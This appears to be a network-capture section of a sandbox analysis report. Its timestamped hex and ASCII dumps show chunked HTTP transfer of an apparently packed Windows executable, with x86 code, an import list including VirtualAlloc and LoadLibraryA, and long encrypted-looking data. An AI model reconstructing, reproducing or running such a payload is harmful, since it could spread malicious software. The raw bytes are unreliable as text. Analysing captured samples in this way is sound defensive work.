                  2022-10-10 21:21:48 UTC46INData Raw: 32 30 30 30 0d 0a 10 e8 b7 36 00 00 59 8b c6 5e c3 6a 08 68 30 82 41 00 e8 69 08 00 00 8b 75 08 85 f6 0f 84 f8 00 00 00 8b 46 24 85 c0 74 07 50 e8 62 f7 ff ff 59 8b 46 2c 85 c0 74 07 50 e8 54 f7 ff ff 59 8b 46 34 85 c0 74 07 50 e8 46 f7 ff ff 59 8b 46 3c 85 c0 74 07 50 e8 38 f7 ff ff 59 8b 46 40 85 c0 74 07 50 e8 2a f7 ff ff 59 8b 46 44 85 c0 74 07 50 e8 1c f7 ff ff 59 8b 46 48 85 c0 74 07 50 e8 0e f7 ff ff 59 8b 46 5c 3d 80 25 40 00 74 07 50 e8 fd f6 ff ff 59 6a 0d e8 7b 54 00 00 59 83 65 fc 00 8b 7e 68 85 ff 74 1a 57 ff 15 20 10 40 00 85 c0 75 0f 81 ff a8 a9 41 00 74 07 57 e8 d0 f6 ff ff 59 c7 45 fc fe ff ff ff e8 57 00 00 00 6a 0c e8 42 54 00 00 59 c7 45 fc 01 00 00 00 8b 7e 6c 85 ff 74 23 57 e8 fb 70 00 00 59 3b 3d 98 a9 41 00 74 14 81 ff c0 a8 41 00
                  Data Ascii: 20006Y^jh0AiuF$tPbYF,tPTYF4tPFYF<tP8YF@tP*YFDtPYFHtPYF\=%@tPYj{TYe~htW @uAtWYEWjBTYE~lt#WpY;=AtA
                  2022-10-10 21:21:48 UTC54INData Raw: 04 04 00 00 8b da
                  Data Ascii:
                  2022-10-10 21:21:48 UTC54INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC54INData Raw: 32 30 30 30 0d 0a 03 d8 83 c3 10 ff 23 80 7a 0e 05 75 11 66 8b 9d 5c ff ff ff 80 cf 02 80 e7 fe b3 3f eb 04 66 bb 3f 13 66 89 9d 5e ff ff ff d9 ad 5e ff ff ff bb 2c a5 41 00 d9 e5 89 95 6c ff ff ff 9b dd bd 60 ff ff ff c6 85 70 ff ff ff 00 d9 c9 8a 8d 61 ff ff ff d9 e5 9b dd bd 60 ff ff ff d9 c9 8a ad 61 ff ff ff d0 e5 d0 fd d0 c5 8a c5 24 0f d7 8a e0 d0 e1 d0 f9 d0 c1 8a c1 24 0f d7 d0 e4 d0 e4 0a c4 0f be c0 81 e1 04 04 00 00 8b da 03 d8 83 c3 10 ff 23 e8 c1 00 00 00 d9 c9 dd d8 c3 e8 b7 00 00 00 eb f6 dd d8 dd d8 d9 ee c3 dd d8 dd d8 d9 e8 c3 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 08 c6 85 70 ff ff ff 07 c3 c6 85 70 ff ff ff 01 dc 05 24 a5 41 00 c3 d9 c9 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 09 c6 85 70 ff ff
                  Data Ascii: 2000#zuf\?f?f^^,Al`pa`a$$#bbi@tpp$Abbi@tp
                  2022-10-10 21:21:48 UTC62INData Raw: 00 68 04 01 00 00
                  Data Ascii: h
                  2022-10-10 21:21:48 UTC62INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC62INData Raw: 32 30 30 30 0d 0a be 38 ee 47 00 56 53 88 1d 3c ef 47 00 ff 15 50 11 40 00 a1 b4 12 48 00 89 35 08 eb 47 00 3b c3 74 07 89 45 fc 38 18 75 03 89 75 fc 8b 55 fc 8d 45 f8 50 53 53 8d 7d f4 e8 0a fe ff ff 8b 45 f8 83 c4 0c 3d ff ff ff 3f 73 4a 8b 4d f4 83 f9 ff 73 42 8b f8 c1 e7 02 8d 04 0f 3b c1 72 36 50 e8 b1 39 00 00 8b f0 59 3b f3 74 29 8b 55 fc 8d 45 f8 50 03 fe 57 56 8d 7d f4 e8 c9 fd ff ff 8b 45 f8 83 c4 0c 48 a3 ec ea 47 00 89 35 f0 ea 47 00 33 c0 eb 03 83 c8 ff 5f 5e 5b c9 c3 8b ff 55 8b ec a1 40 ef 47 00 83 ec 0c 53 56 8b 35 64 11 40 00 57 33 db 33 ff 3b c3 75 2e ff d6 8b f8 3b fb 74 0c c7 05 40 ef 47 00 01 00 00 00 eb 23 ff 15 7c 10 40 00 83 f8 78 75 0a 6a 02 58 a3 40 ef 47 00 eb 05 a1 40 ef 47 00 83 f8 01 0f 85 81 00 00 00 3b fb 75 0f ff d6 8b f8
                  Data Ascii: 20008GVS<GP@H5G;tE8uuUEPSS}E=?sJMsB;r6P9Y;t)UEPWV}EHG5G3_^[U@GSV5d@W33;u.;t@G#|@xujX@G@G;u
                  2022-10-10 21:21:48 UTC70INData Raw: 83 25 c0 f3 47 00
                  Data Ascii: %G
                  2022-10-10 21:21:48 UTC70INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC70INData Raw: 31 66 66 38 0d 0a 00 8b 4d fc 89 08 8d 42 04 5f 5e 5b c9 c3 33 c0 c3 6a 0c 68 a0 84 41 00 e8 63 a8 ff ff 83 65 fc 00 66 0f 28 c1 c7 45 e4 01 00 00 00 eb 23 8b 45 ec 8b 00 8b 00 3d 05 00 00 c0 74 0a 3d 1d 00 00 c0 74 03 33 c0 c3 33 c0 40 c3 8b 65 e8 83 65 e4 00 c7 45 fc fe ff ff ff 8b 45 e4 e8 65 a8 ff ff c3 8b ff 55 8b ec 83 ec 18 33 c0 53 89 45 fc 89 45 f4 89 45 f8 53 9c 58 8b c8 35 00 00 20 00 50 9d 9c 5a 2b d1 74 1f 51 9d 33 c0 0f a2 89 45 f4 89 5d e8 89 55 ec 89 4d f0 b8 01 00 00 00 0f a2 89 55 fc 89 45 f8 5b f7 45 fc 00 00 00 04 74 0e e8 5c ff ff ff 85 c0 74 05 33 c0 40 eb 02 33 c0 5b c9 c3 e8 99 ff ff ff a3 ac 12 48 00 33 c0 c3 8b ff 55 8b ec 8b 45 08 8a 4d 10 53 56 57 33 ff 89 78 04 8b 45 08 33 db 89 78 08 8b 45 08 43 89 78 0c f6 c1 10 74 0d 8b 45
                  Data Ascii: 1ff8MB_^[3jhAcef(E#E=t=t33@eeEEeU3SEEESX5 PZ+tQ3E]UMUE[Et\t3@3[H3UEMSVW3xE3xECxtE
                  2022-10-10 21:21:48 UTC78INData Raw: 32 30 30 30 0d 0a
                  Data Ascii: 2000
                  2022-10-10 21:21:48 UTC78INData Raw: f6 45 ff 40 89 5d e8 0f 85 a8 01 00 00 8b 45 f8 b9 00 00 00 c0 23 c1 3d 00 00 00 40 0f 84 b7 00 00 00 3d 00 00 00 80 74 77 3b c1 0f 85 84 01 00 00 8b 45 ec 3b c3 0f 86 79 01 00 00 83 f8 02 76 0e 83 f8 04 76 30 83 f8 05 0f 85 66 01 00 00 0f be 45 fe 33 ff 48 0f 84 26 01 00 00 48 0f 85 52 01 00 00 c7 45 e8 ff fe 00 00 c7 45 ec 02 00 00 00 e9 1a 01 00 00 6a 02 53 53 ff 36 e8 c4 e9 ff ff 83 c4 10 0b c2 74 c7 53 53 53 ff 36 e8 b3 e9 ff ff 23 c2 83 c4 10 83 f8 ff 0f 84 8e fe ff ff 6a 03 8d 45 e8 50 ff 36 e8 96 2c 00 00 83 c4 0c 83 f8 ff 0f 84 75 fe ff ff 83 f8 02 74 6b 83 f8 03 0f 85 ad 00 00 00 81 7d e8 ef bb bf 00 75 59 c6 45 fe 01 e9 dc 00 00 00 8b 45 ec 3b c3 0f 86 d1 00 00 00 83 f8 02 0f 86 62 ff ff ff 83 f8 04 0f 87 50 ff ff ff 6a 02 53 53 ff 36 e8 44 e9
                  Data Ascii: E@]E#=@=tw;E;yvv0fE3H&HREEjSS6tSSS6#jEP6,utk}uYEE;bPjSS6D
                  2022-10-10 21:21:48 UTC86INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC87INData Raw: 32 30 30 30 0d 0a 40 ff 85 44 e5 ff ff 81 bd 44 e5 ff ff ff 13 00 00 72 c2 8b d8 8d 85 48 e5 ff ff 2b d8 6a 00 8d 85 2c e5 ff ff 50 53 8d 85 48 e5 ff ff 50 8b 06 ff 34 07 ff 15 4c 11 40 00 85 c0 0f 84 42 02 00 00 8b 85 2c e5 ff ff 01 85 38 e5 ff ff 3b c3 0f 8c 3a 02 00 00 8b 85 3c e5 ff ff 2b 85 34 e5 ff ff 3b 45 10 0f 82 4c ff ff ff e9 20 02 00 00 89 85 44 e5 ff ff 80 fb 02 0f 85 d1 00 00 00 39 4d 10 0f 86 4d 02 00 00 eb 06 8b b5 28 e5 ff ff 8b 8d 44 e5 ff ff 83 a5 3c e5 ff ff 00 2b 8d 34 e5 ff ff 8d 85 48 e5 ff ff 3b 4d 10 73 46 8b 95 44 e5 ff ff 83 85 44 e5 ff ff 02 0f b7 12 41 41 66 83 fa 0a 75 16 83 85 30 e5 ff ff 02 6a 0d 5b 66 89 18 40 40 83 85 3c e5 ff ff 02 83 85 3c e5 ff ff 02 66 89 10 40 40 81 bd 3c e5 ff ff fe 13 00 00 72 b5 8b d8 8d 85 48 e5
                  Data Ascii: 2000@DDrH+j,PSHP4L@B,8;:<+4;EL D9MM(D<+4H;MsFDDAAfu0j[f@@<<f@@<rH
                  2022-10-10 21:21:48 UTC95INData Raw: e8 1e 76 ff ff 59
                  Data Ascii: vY
                  2022-10-10 21:21:48 UTC95INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC95INData Raw: 32 30 30 30 0d 0a e8 9a 32 ff ff c7 00 0c 00 00 00 33 c0 e8 bb 48 ff ff c3 e8 87 32 ff ff e9 7c ff ff ff 85 ff 75 16 e8 79 32 ff ff 8b f0 ff 15 7c 10 40 00 50 e8 29 32 ff ff 89 06 59 8b c7 eb d2 8b ff 55 8b ec 53 56 8b 75 08 57 33 ff 83 cb ff 3b f7 75 1c e8 4b 32 ff ff 57 57 57 57 57 c7 00 16 00 00 00 e8 ad 1e ff ff 83 c4 14 0b c3 eb 42 f6 46 0c 83 74 37 56 e8 5e 6e ff ff 56 8b d8 e8 12 11 00 00 56 e8 2b 5b ff ff 50 e8 f5 02 00 00 83 c4 10 85 c0 7d 05 83 cb ff eb 11 8b 46 1c 3b c7 74 0a 50 e8 f5 36 ff ff 59 89 7e 1c 89 7e 0c 8b c3 5f 5e 5b 5d c3 6a 0c 68 e8 86 41 00 e8 ca 47 ff ff 83 4d e4 ff 33 c0 8b 75 08 33 ff 3b f7 0f 95 c0 3b c7 75 1d e8 c8 31 ff ff c7 00 16 00 00 00 57 57 57 57 57 e8 2a 1e ff ff 83 c4 14 83 c8 ff eb 0c f6 46 0c 40 74 0c 89 7e 0c 8b
                  Data Ascii: 200023H2|uy2|@P)2YUSVuW3;uK2WWWWWBFt7V^nVV+[P}F;tP6Y~~_^[]jhAGM3u3;;u1WWWWW*F@t~
                  2022-10-10 21:21:48 UTC103INData Raw: a4 75 03 2b 45 1c
                  Data Ascii: u+E
                  2022-10-10 21:21:48 UTC103INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC103INData Raw: 32 30 30 30 0d 0a 3d 50 14 00 00 0f 8f 22 03 00 00 3d b0 eb ff ff 0f 8c 2e 03 00 00 b9 80 b2 41 00 83 e9 60 89 45 ac 3b c2 0f 84 e9 02 00 00 7d 0d f7 d8 b9 e0 b3 41 00 89 45 ac 83 e9 60 39 55 14 75 06 33 c0 66 89 45 c4 39 55 ac 0f 84 c6 02 00 00 eb 05 8b 4d 84 33 d2 8b 45 ac c1 7d ac 03 83 c1 54 83 e0 07 89 4d 84 3b c2 0f 84 9d 02 00 00 6b c0 0c 03 c1 8b d8 b8 00 80 00 00 66 39 03 72 0e 8b f3 8d 7d b8 a5 a5 a5 ff 4d ba 8d 5d b8 0f b7 4b 0a 33 c0 89 45 b0 89 45 d4 89 45 d8 89 45 dc 8b 45 ce 8b f1 ba ff 7f 00 00 33 f0 23 c2 23 ca 81 e6 00 80 00 00 bf ff 7f 00 00 8d 14 01 89 75 90 0f b7 d2 66 3b c7 0f 83 21 02 00 00 66 3b cf 0f 83 18 02 00 00 bf fd bf 00 00 66 3b d7 0f 87 0a 02 00 00 be bf 3f 00 00 66 3b d6 77 0d 33 c0 89 45 c8 89 45 c4 e9 0e 02 00 00 33 f6
                  Data Ascii: 2000=P"=.A`E;}AE`9Uu3fE9UM3E}TM;kf9r}M]K3EEEEE3##uf;!f;f;?f;w3EE3
                  2022-10-10 21:21:48 UTC111INData Raw: 64 64 72 65 73 73
                  Data Ascii: ddress
                  2022-10-10 21:21:48 UTC111INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC111INData Raw: 32 30 30 30 0d 0a 00 00 54 04 56 69 72 74 75 61 6c 41 6c 6c 6f 63 00 00 a1 03 53 65 74 43 6f 6d 70 75 74 65 72 4e 61 6d 65 41 00 00 8d 02 47 6c 6f 62 61 6c 47 65 74 41 74 6f 6d 4e 61 6d 65 41 00 00 f1 02 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 00 82 04 57 72 69 74 65 43 6f 6e 73 6f 6c 65 41 00 f9 02 4c 6f 63 61 6c 41 6c 6c 6f 63 00 00 d7 01 47 65 74 46 69 6c 65 54 79 70 65 00 92 04 57 72 69 74 65 50 72 69 76 61 74 65 50 72 6f 66 69 6c 65 53 74 72 69 6e 67 41 00 00 75 00 43 72 65 61 74 65 45 76 65 6e 74 57 00 00 03 00 41 64 64 41 74 6f 6d 41 00 00 45 01 46 6f 6c 64 53 74 72 69 6e 67 41 00 2e 01 46 69 6e 64 4e 65 78 74 46 69 6c 65 41 00 a9 03 53 65 74 43 6f 6e 73 6f 6c 65 43 75 72 73 6f 72 49 6e 66 6f 00 00 f6 01 47 65 74 4d 6f 64 75 6c 65 48 61 6e 64 6c 65
                  Data Ascii: 2000TVirtualAllocSetComputerNameAGlobalGetAtomNameALoadLibraryAWriteConsoleALocalAllocGetFileTypeWritePrivateProfileStringAuCreateEventWAddAtomAEFoldStringA.FindNextFileASetConsoleCursorInfoGetModuleHandle
                  2022-10-10 21:21:48 UTC119INData Raw: 00 00 00 00 00 00
                  Data Ascii:
                  2022-10-10 21:21:48 UTC119INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC119INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: 2000
                  2022-10-10 21:21:48 UTC127INData Raw: 00 00 00 00 00 00
                  Data Ascii:
                  2022-10-10 21:21:48 UTC127INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC127INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: 2000
                  2022-10-10 21:21:48 UTC135INData Raw: c1 7d d0 de c9 81
                  Data Ascii: }
                  2022-10-10 21:21:48 UTC135INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC135INData Raw: 31 66 66 38 0d 0a 85 82 df fa 80 a8 2a 60 54 13 75 d5 b9 c5 80 14 9d 9b 45 b9 eb 44 f4 e3 f5 29 7b 5e 41 83 10 b1 b7 f9 ca 64 a1 4c c6 d4 83 47 70 38 9b 91 f2 62 c8 7f 3a 9c 37 f5 30 2c dc a1 c8 85 a5 a3 97 5b da e0 fe ca 30 d0 3c ca 3f ce 06 63 16 dd 15 87 83 49 b1 f4 63 62 71 0a b1 84 d4 82 19 f9 a0 89 f9 9d a3 e4 5b 9e ae 5d 86 a4 8f bf 90 c1 ac 37 95 b2 16 d9 c8 49 e5 fa cd 89 86 e1 51 c6 28 70 1e a4 e1 a9 5c 87 0c e6 63 9f a0 5f 74 6a 56 86 a2 45 e7 d4 aa 4b 6f 15 98 34 cd d9 b7 55 1b f6 a4 a7 f0 61 c6 39 a6 14 74 c0 51 be b7 e8 ac d1 69 98 40 41 6a 55 8f 25 88 23 c1 d4 35 0e bf a5 b2 f7 77 f8 0a 5a c0 ea a0 d5 a7 2e 79 9c 25 9a 36 4f aa 11 4f 26 0c 87 5e e6 db 5a 81 63 64 0c 0f 15 f4 aa 71 93 5b 68 c9 99 93 76 4e d6 2f d8 54 64 c4 d9 48 a6 6b 44 63
                  Data Ascii: 1ff8*`TuED){^AdLGp8b:70,[0<?cIcbq[]7IQ(p\c_tjVEKo4Ua9tQi@AjU%#5wZ.y%6OO&^Zcdq[hvN/TdHkDc
                  2022-10-10 21:21:48 UTC143INData Raw: 32 30 30 30 0d 0a
                  Data Ascii: 2000
                  2022-10-10 21:21:48 UTC143INData Raw: 31 f0 b2 7d a0 ad ca e0 36 7c 52 e8 9b 5a f4 0d 08 54 7b d5 57 18 8f e9 a9 b5 94 b3 ef 49 cf 07 81 39 48 3b 33 fc c8 a0 6e ec 41 0f 1b b3 ef b5 8c 93 f2 f4 75 b2 9a dc e1 93 62 6f e3 52 78 c5 5b 16 4d 45 1a eb 06 6b 07 2f 02 05 f7 d1 e1 f7 c5 d7 a6 4e e6 41 d7 1b fd 5a c1 2e a1 61 97 de 66 ea 32 7c 25 59 e3 91 3c ee 3f 13 63 f9 73 82 56 49 95 2f 4a 04 eb 56 35 83 5e a9 42 b7 dc 6d d8 e5 8a 40 5d d6 4f 8a b8 b8 a5 4a 05 14 e3 a3 93 76 15 06 c3 39 47 56 ec f7 06 f8 28 5f 8b b1 cb 02 e9 0f 53 44 a8 63 8a 1e 94 70 3b 43 79 00 c1 9b bf d5 b9 1a 62 07 00 62 68 63 11 2c 75 db c7 5c 6a ab ec 86 b0 66 9a 88 8e 39 cf 7b 7b 39 01 a4 0f 59 f8 a7 82 e2 8c ea 65 71 85 af 77 4a 30 c7 a0 e2 06 f1 e2 02 0b f5 f0 b6 49 d0 83 6d f3 9c a0 96 58 93 1d 8d 91 4c 24 2e 11 2a 11
                  Data Ascii: 1}6|RZT{WI9H;3nAuboRx[MEk/NAZ.af2|%Y<?csVI/JV5^Bm@]OJv9GV(_SDcp;Cybbhc,u\jf9{{9YeqwJ0ImXL$.*
                  2022-10-10 21:21:48 UTC151INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC151INData Raw: 32 30 30 30 0d 0a 77 ac 09 0f 6f c0 ff 33 73 cd f2 e2 16 8e 8c 9d 54 e7 8c db 6c 90 34 dd dc bd 9c 8f 3d 64 b6 c2 c5 b6 34 ca c2 c3 58 36 ec 6b ab ba 49 82 30 dc a9 30 09 44 9d 29 07 99 83 7d b6 76 19 e8 20 77 bd 05 50 91 d1 d0 dd 2a 4e ad 3b 99 dc da 3b 0b b1 fb 1c 10 f8 0d 9e 63 1b 43 71 5f a5 5d e0 d9 f6 af b3 7f 57 f3 7e 7d 2b 34 0f c6 87 e4 11 e3 42 18 db ea 8f 36 be 8e 59 30 aa a3 ba 04 ed 92 c8 f8 f7 17 87 bb 8a 9a be 88 9c 81 72 70 24 74 b2 ff 20 01 d1 30 0f 8b ff 04 14 a5 67 16 79 c8 c8 ae 3b 2f e3 e8 6b a9 12 bf 60 a9 84 cd e1 f5 e6 c7 9e 35 a6 32 e9 ea d2 6d b9 88 b7 af 07 a4 00 18 2f 5c 04 e8 93 ec 4c 91 40 d3 75 ab 4e d0 d2 7a 8b 39 57 f7 9c 0e aa 48 94 d6 6a ae e2 fa 57 03 80 77 cb e2 3d 46 03 ce 8e 5b 50 66 14 2c 1b 9a 21 cf 5e 47 8b 8a f3
                  Data Ascii: 2000wo3sTl4=d4X6kI00D)}v wP*N;;cCq_]W~}+4B6Y0rp$t 0gy;/k`52m/\L@uNz9WHjWw=F[Pf,!^G
                  2022-10-10 21:21:48 UTC159INData Raw: cb 0e 02 43 9f 81
                  Data Ascii: C
                  2022-10-10 21:21:48 UTC159INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC159INData Raw: 32 30 30 30 0d 0a a4 b2 f5 86 87 98 0a cc b5 32 67 05 b7 16 f1 7a 65 dc fa e8 ad 1e bc 01 84 1d e3 5e 24 6e c7 4f a7 53 c4 5f 17 5a d0 05 be 52 20 a6 99 68 4d 76 21 83 d7 39 45 2c 5e 99 eb a8 5c b7 76 3a db 2c d7 0e 79 df a8 90 7e de ce 86 18 12 00 28 78 7b cf c2 3b 29 6d 8e 0a 99 83 bc 98 38 2a 57 e3 f1 5f f7 83 15 37 2a 95 ab d6 cc cd 20 f6 9d 30 c2 9a c7 6d 33 43 05 7b 9f 60 5d ef b8 82 be 50 d3 47 46 0a 37 30 f5 44 ac e7 06 40 8e 09 22 16 c0 46 85 24 63 48 e2 1a fe 06 d8 0e 74 65 88 fe 23 cb 0b 80 83 e4 08 8f 42 40 ea 8e 6a b1 b3 83 c5 75 db 7f f2 22 84 2f 5a 2c ca ae fe fe 11 ec 20 9f 44 b6 94 88 e5 a8 b6 5e f1 da 9f 84 92 60 62 f1 31 54 f0 af 9f 19 83 98 c1 42 71 d2 d2 61 80 69 89 c1 f3 51 9f 7d 23 4c 43 96 b6 c1 ec 80 2d 2d 60 bc 96 1c be c4 ac 17
                  Data Ascii: 20002gze^$nOS_ZR hMv!9E,^\v:,y~(x{;)m8*W_7* 0m3C{`]PGF70D@"F$cHte#B@ju"/Z, D^`b1TBqaiQ}#LC--`
                  2022-10-10 21:21:48 UTC167INData Raw: 18 16 12 b7 c3 e5
                  Data Ascii:
                  2022-10-10 21:21:48 UTC167INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC167INData Raw: 32 30 30 30 0d 0a fe 13 5c 57 34 64 ed de 8c 9a 92 56 3a fc 2c 07 74 5c e1 22 e7 f6 f6 10 87 b3 03 c0 6c 5e 30 56 1f 77 2a 15 43 53 be 4a ca 70 ae 5b 96 a0 80 98 f7 ea 71 8e c7 e0 e5 9b b6 87 bf d4 0c 7c 57 0f 5d 7f ab 94 c4 ba fa 15 59 6c 11 63 39 8e c2 2d 62 59 82 33 29 1c ec 50 55 1c 73 16 60 ae f5 2e 5b 6a 6b ee 48 6e 74 d1 9d 3c d1 22 b6 b3 40 b1 45 d9 c6 2d b4 e2 6e 4d 3c e9 e2 10 89 ce 47 7d f6 46 fe 9e a8 cd 79 11 1a 0d ee c9 eb f8 10 6f 41 0f 75 66 9a fe c8 20 90 35 6e e9 e7 2e b4 77 ef f7 e2 77 73 1d ba 1b 2d f9 ec 00 d7 fb 50 ea 4e 62 48 00 6b 07 2b 8c 48 da 5a f8 9c c1 4b 55 21 9d d5 8b 3a 4b d1 10 20 89 fd 7c 07 08 ca 97 d8 f4 f9 5e ed ce 88 c9 78 8e 27 35 99 50 b1 72 2b bb ff a8 d1 a0 b9 a0 c6 0c 03 9d d2 32 79 e0 6f ba a3 e1 22 46 75 76 62
                  Data Ascii: 2000\W4dV:,t\"l^0Vw*CSJp[q|W]Ylc9-bY3)PUs`.[jkHnt<"@E-nM<G}FyoAuf 5n.wws-PNbHk+HZKU!:K |^x'5Pr+2yo"Fuvb
                  2022-10-10 21:21:48 UTC175INData Raw: 29 f0 4a b9 df 11
                  Data Ascii: )J
                  2022-10-10 21:21:48 UTC175INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC175INData Raw: 32 30 30 30 0d 0a 67 5a 8c 5f 2d af 9b 73 f1 38 58 0e 93 82 80 2d 91 c0 ec 14 47 c4 60 ed c4 1f 85 d9 32 bc 63 99 4a 89 cd 2a 75 6f ce 6a 30 58 28 e6 a5 cd 03 ca e1 2d 81 09 95 77 2e 94 21 6d 49 01 04 82 8a 81 70 44 e7 38 16 2a 4f 5f fd 12 85 69 72 73 01 2d e3 ce 36 11 95 21 94 a5 f8 1a 73 7f 11 a9 96 1b 96 2d 8f 99 9b 52 2d 8b 9c 7b d3 d4 9c e8 c5 b2 e9 58 dd af 73 58 7a 7a 50 63 51 7f 6a 78 59 42 78 d1 cd 88 94 c4 e3 8c cb 85 13 f4 97 aa 4b bf 76 d4 25 4f b5 79 c4 3c a8 1d b6 dc 91 89 ae 53 a1 2a 83 32 bb fd c9 8d d3 0e 9d 93 b8 4c f6 0c 45 73 7b 37 4e 6b 1f 80 e1 07 73 9e 10 de 1a b1 20 f6 de 5e 93 3e be 73 ce 8c 72 01 bd 5d e4 3e e1 da 4a c0 5c 00 b7 8c ab af 56 ef 46 07 2c db 41 3d d0 41 54 17 98 1d be 0e 1d 2e 39 49 96 00 12 26 05 25 f6 fb cf 58 27
                  Data Ascii: 2000gZ_-s8X-G`2cJ*uoj0X(-w.!mIpD8*O_irs-6!s-R-{XsXzzPcQjxYBxKv%Oy<S*2LEs{7Nks ^>sr]>J\VF,A=AT.9I&%X'
                  2022-10-10 21:21:48 UTC183INData Raw: 8a 65 9e ea a1 48
                  Data Ascii: eH
                  2022-10-10 21:21:48 UTC183INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC183INData Raw: 32 30 30 30 0d 0a a0 5f 93 01 eb a1 6b 22 51 c2 c9 69 37 c7 f9 ed 2c 3b 3e ed ab f9 7c ed b5 21 2e fd 7d 76 47 60 a8 57 94 66 13 d2 8e 11 a2 55 5f 0f 40 cb 99 5d 62 00 ba 98 a8 fd 62 eb e7 a9 68 c3 bc fe c2 7f 4d e7 cf 87 83 6f 0b 9b 5f b8 0b 41 47 20 2e 2f 0a 7c 73 78 66 c4 b6 36 f0 24 3c 84 cc 7e 9c 7b 61 f8 98 1e b6 8c b5 85 bc 35 95 32 77 6e 1b 49 91 8c 24 82 87 67 83 2a 64 5e 0f 5d 92 aa 23 8d 04 27 f6 59 8b 54 09 0a 0b 27 7a 78 8e 8e 88 c9 ee 2e 7e d9 6f 93 2c 45 31 bf cb da 28 6b 1e 21 a8 79 22 d8 6d b4 8d 71 df eb 55 4e 53 c2 0f d4 de 75 e7 32 30 98 16 7f fc 70 2a d5 50 58 59 22 f1 b2 03 af 88 1a aa 36 29 d8 7e ec c4 a1 d2 4c c2 9e 4e d6 f0 11 91 2e 8f 0a c2 da b7 64 07 dd 2f 55 71 d4 9f d5 d0 1e 50 35 11 8a 19 2b 70 49 4d f5 93 7c 77 bc c6 af 78
                  Data Ascii: 2000_k"Qi7,;>|!.}vG`WfU_@]bbhMo_AG ./|sxf6$<~{a52wnI$g*d^]#'YT'zx.~o,E1(k!y"mqUNSu20p*PXY"6)~LN.d/UqP5+pIM|wx
                  2022-10-10 21:21:48 UTC191INData Raw: 51 10 c3 95 2a 3a
                  Data Ascii: Q*:
                  2022-10-10 21:21:48 UTC191INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC191INData Raw: 32 30 30 30 0d 0a 9a b0 f8 d5 41 76 36 82 db 8b 18 06 7e 67 26 66 7e e7 39 69 e2 4f 66 16 ad 06 17 bc e3 80 da 3f 40 0f c6 11 97 3b d6 50 ca 79 f1 f1 37 4d 2b 1c 05 fe ab 12 af 1a 2e 52 3c 12 ca 12 17 67 2e 7c 13 8d 06 8d 94 63 af 49 72 3c 8e 21 eb 86 7d 73 8a ae 70 5f 84 be e2 97 72 b4 3a 13 4b 8c 9f cc f5 0a 58 ee 6d d5 d8 c1 be 22 db 6f f2 32 0b b3 77 41 c7 a3 e3 9d 96 21 de 51 9b 25 98 5a 4e b6 31 20 ee 2b 9d 30 c8 8e 55 b2 9b f1 bf 90 2e 49 11 26 b7 7c 18 58 26 d6 1a d5 85 fb 07 10 81 e8 2c 53 b0 51 16 e6 1e 73 a5 a2 1f 04 41 97 40 3d 2e b7 ba e6 81 5d 34 bb e7 2d 66 18 72 24 55 6f 1a 58 b6 3a 01 69 35 29 5b cf ef 2e 25 47 21 49 bc a0 db bd 83 de a9 9f f5 2d ca 77 ef de 14 cd 94 76 e4 bb 77 37 bc a4 9b 25 a1 84 71 f5 df cf f6 54 f8 85 4c 1b 8e e6 31
